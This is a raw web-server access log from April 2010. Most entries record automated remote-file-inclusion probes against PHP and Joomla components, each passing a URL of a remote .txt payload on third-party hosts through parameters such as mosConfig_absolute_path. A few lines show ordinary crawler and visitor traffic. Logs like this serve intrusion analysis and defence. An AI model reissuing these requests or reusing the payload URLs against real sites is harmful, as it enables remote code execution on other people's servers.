209.216.43.133 - - [07/Apr/2010:05:40:10 -0400] "GET /logs/index0.php?show=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:40:10 -0400] "GET /index0.php?show=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:40:10 -0400] "GET /logs/access_log.Q109121500%20%20/index0.php?show=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:40:10 -0400] "GET /logs/access_log.Q110031800%20%20/index0.php?show=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:40:11 -0400] "GET /index0.php?show=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:40:11 -0400] "GET /logs/access_log.Q109121500%20%20/index0.php?show=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:40:11 -0400] "GET /logs/index0.php?show=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:40:11 -0400] "GET /logs/access_log.Q110031800%20%20/index0.php?show=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:05:40:15 -0400] "GET //instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:05:40:15 -0400] "GET /logs//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:05:40:15 -0400] "GET /logs/access_log.Q109051500//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:05:40:16 -0400] "GET /logs/access_log.Q109120800//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:05:40:19 -0400] "GET /logs/access_log.Q109051500//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:05:40:19 -0400] "GET /logs//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:05:40:19 -0400] "GET //instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:05:40:19 -0400] "GET /logs/access_log.Q109120800//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
66.249.65.182 - - [07/Apr/2010:05:40:20 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L011AFD5955017600A8BB05E+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
88.191.94.188 - - [07/Apr/2010:05:40:28 -0400] "GET ////////?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 200 458 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:05:40:28 -0400] "GET /logs/access_log.Q109072400%20%20////////?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:05:40:33 -0400] "GET ////////?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 200 458 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:05:40:28 -0400] "GET /logs////////?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 200 45247 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:05:40:33 -0400] "GET /logs/access_log.Q109072400%20%20////////?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:05:40:33 -0400] "GET /logs////////?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 200 45247 "-" "Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:05:41:07 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.fruehaufsteher.de/hpmaker/id1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:05:41:07 -0400] "GET /logs/access_log.Q109061400/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.fruehaufsteher.de/hpmaker/id1.txt? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:05:41:07 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.fruehaufsteher.de/hpmaker/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:05:41:07 -0400] "GET /logs/access_log.Q110011600/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.fruehaufsteher.de/hpmaker/id1.txt? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:05:41:09 -0400] "GET /logs//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.goodigood.com//js/edit.files/ver1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:05:41:10 -0400] "GET //instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.goodigood.com//js/edit.files/ver1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:05:41:10 -0400] "GET /logs/access_log.Q110012300%20%20//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.goodigood.com//js/edit.files/ver1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:05:41:16 -0400] "GET /logs/access_log.Q109070300%20%20////////?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:05:41:19 -0400] "GET /logs/access_log.Q109070300%20%20////////?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:05:41:20 -0400] "GET //instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:05:41:20 -0400] "GET /logs//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:05:41:20 -0400] "GET /logs/access_log.Q109052100%20%20//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:05:41:28 -0400] "GET /logs//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:05:41:28 -0400] "GET //instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:05:41:28 -0400] "GET /logs/access_log.Q109052100%20%20//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
124.217.198.155 - - [07/Apr/2010:05:41:36 -0400] "GET //appserv/main.php?appserv_root=http://www.bowlingkorea.com//club/main/1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
124.217.198.155 - - [07/Apr/2010:05:41:36 -0400] "GET /logs//appserv/main.php?appserv_root=http://www.bowlingkorea.com//club/main/1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
124.217.198.155 - - [07/Apr/2010:05:41:36 -0400] "GET /logs/error_log.Q109052000%20%20//appserv/main.php?appserv_root=http://www.bowlingkorea.com//club/main/1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:05:41:39 -0400] "GET //instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:05:41:39 -0400] "GET /logs//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:05:41:39 -0400] "GET /logs/access_log.Q110012300%20%20//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:05:41:50 -0400] "GET /logs/access_log.Q109052100%20%20//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.goodigood.com//js/edit.files/ver1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
203.19.4.18 - - [07/Apr/2010:05:41:55 -0400] "GET /logs/access_log.Q109080600//admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
203.19.4.18 - - [07/Apr/2010:05:41:59 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
203.19.4.18 - - [07/Apr/2010:05:42:05 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
64.15.158.246 - - [07/Apr/2010:05:42:15 -0400] "GET /logs/error_log.Q109073100%20%20//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:05:42:22 -0400] "GET /logs/access_log.Q109121200%20%20//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:05:42:23 -0400] "GET /logs/access_log.Q109121200%20%20//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:05:42:51 -0400] "GET /logs/access_log.Q109061400%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.fruehaufsteher.de/hpmaker/id1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:05:42:51 -0400] "GET /logs/access_log.Q110011600%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.fruehaufsteher.de/hpmaker/id1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
91.113.64.3 - - [07/Apr/2010:05:43:06 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
91.113.64.3 - - [07/Apr/2010:05:43:06 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
91.113.64.3 - - [07/Apr/2010:05:43:08 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
91.113.64.3 - - [07/Apr/2010:05:43:08 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
95.108.128.242 - - [07/Apr/2010:05:43:40 -0400] "GET /2008.itcweb.co.uk/internet-hosting/email-hosting/ HTTP/1.1" 404 247 "-" "Yandex/1.01.001 (compatible; Win16; I)"
124.217.198.155 - - [07/Apr/2010:05:43:41 -0400] "GET /logs/access_log.Q110021500%20%20//appserv/main.php?appserv_root=http://www.bowlingkorea.com//club/main/1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
209.126.254.139 - - [07/Apr/2010:05:44:20 -0400] "GET //instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
209.126.254.139 - - [07/Apr/2010:05:44:20 -0400] "GET /logs//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.126.254.139 - - [07/Apr/2010:05:44:21 -0400] "GET /logs/access_log.Q109051500//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
209.126.254.139 - - [07/Apr/2010:05:44:21 -0400] "GET //instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
209.126.254.139 - - [07/Apr/2010:05:44:22 -0400] "GET /logs//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.126.254.139 - - [07/Apr/2010:05:44:22 -0400] "GET /logs/access_log.Q109051500//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
209.126.254.139 - - [07/Apr/2010:05:44:31 -0400] "GET /logs/access_log.Q109120800//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
209.126.254.139 - - [07/Apr/2010:05:44:33 -0400] "GET /logs/access_log.Q109120800//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:05:45:15 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:05:45:15 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:05:45:15 -0400] "GET /logs/access_log.Q110032100%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:05:45:15 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:05:45:15 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:05:45:15 -0400] "GET /logs/access_log.Q110032100%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:05:45:19 -0400] "GET /logs/access_log.Q110010500%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:05:45:19 -0400] "GET /logs/access_log.Q110010500%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.59.12.99 - - [07/Apr/2010:05:46:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.126.254.139 - - [07/Apr/2010:05:47:26 -0400] "GET //instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
209.126.254.139 - - [07/Apr/2010:05:47:26 -0400] "GET /logs//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.126.254.139 - - [07/Apr/2010:05:47:26 -0400] "GET /logs/access_log.Q110012300%20%20//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
209.126.254.139 - - [07/Apr/2010:05:47:33 -0400] "GET //instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
209.126.254.139 - - [07/Apr/2010:05:47:33 -0400] "GET /logs//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.126.254.139 - - [07/Apr/2010:05:47:34 -0400] "GET /logs/access_log.Q110012300%20%20//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
95.108.128.242 - - [07/Apr/2010:05:47:41 -0400] "GET /images/_notes/ace_bkgrd_wide_r1_c4.jpg.mno HTTP/1.1" 200 268 "-" "Yandex/1.01.001 (compatible; Win16; I)"
217.73.226.51 - - [07/Apr/2010:05:48:11 -0400] "GET /logs/error_log.Q109100900//yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.833"
217.73.226.51 - - [07/Apr/2010:05:48:11 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.833"
217.73.226.51 - - [07/Apr/2010:05:48:11 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.833"
217.73.226.51 - - [07/Apr/2010:05:48:12 -0400] "GET /logs/error_log.Q109100900//yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.833"
217.73.226.51 - - [07/Apr/2010:05:48:12 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.833"
217.73.226.51 - - [07/Apr/2010:05:48:12 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.833"
217.73.226.51 - - [07/Apr/2010:05:48:13 -0400] "GET /logs/error_log.Q109100900//yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.833"
217.73.226.51 - - [07/Apr/2010:05:48:13 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.833"
217.73.226.51 - - [07/Apr/2010:05:48:13 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.833"
217.73.226.51 - - [07/Apr/2010:05:48:15 -0400] "GET /logs/error_log.Q109100900//yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.833"
217.73.226.51 - - [07/Apr/2010:05:48:15 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.833"
217.73.226.51 - - [07/Apr/2010:05:48:15 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.833"
217.73.226.51 - - [07/Apr/2010:05:48:18 -0400] "GET /logs/error_log.Q109100900//yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.833"
217.73.226.51 - - [07/Apr/2010:05:48:18 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.833"
217.73.226.51 - - [07/Apr/2010:05:48:18 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.833"
209.126.254.139 - - [07/Apr/2010:05:48:30 -0400] "GET /logs/access_log.Q109052100%20%20//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
209.126.254.139 - - [07/Apr/2010:05:48:33 -0400] "GET /logs/error_log.Q109073100%20%20//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.126.254.139 - - [07/Apr/2010:05:49:40 -0400] "GET //instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
209.126.254.139 - - [07/Apr/2010:05:49:40 -0400] "GET /logs//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.126.254.139 - - [07/Apr/2010:05:49:40 -0400] "GET /logs/access_log.Q110012300//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
209.126.254.139 - - [07/Apr/2010:05:49:41 -0400] "GET //instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
209.126.254.139 - - [07/Apr/2010:05:49:41 -0400] "GET /logs//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.126.254.139 - - [07/Apr/2010:05:49:41 -0400] "GET /logs/access_log.Q110012300//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
209.126.254.139 - - [07/Apr/2010:05:50:33 -0400] "GET /logs/error_log.Q109073100//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
209.126.254.139 - - [07/Apr/2010:05:50:34 -0400] "GET /logs/error_log.Q109073100//instyled-design.de/instyled-design.de//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
95.108.128.242 - - [07/Apr/2010:05:51:42 -0400] "GET /images/_notes/ace_bkgrd_wide_r1_c3.jpg.mno HTTP/1.1" 200 265 "-" "Yandex/1.01.001 (compatible; Win16; I)"
188.165.195.229 - - [07/Apr/2010:05:51:45 -0400] "GET //myevent.php?myevent_path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:05:51:45 -0400] "GET /logs/error_log.Q110021500//myevent.php?myevent_path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:05:51:45 -0400] "GET /logs//myevent.php?myevent_path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:05:51:55 -0400] "GET /logs/access_log.Q110021500//myevent.php?myevent_path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:05:52:06 -0400] "GET //myevent.php?myevent_path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:05:52:06 -0400] "GET /logs//myevent.php?myevent_path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
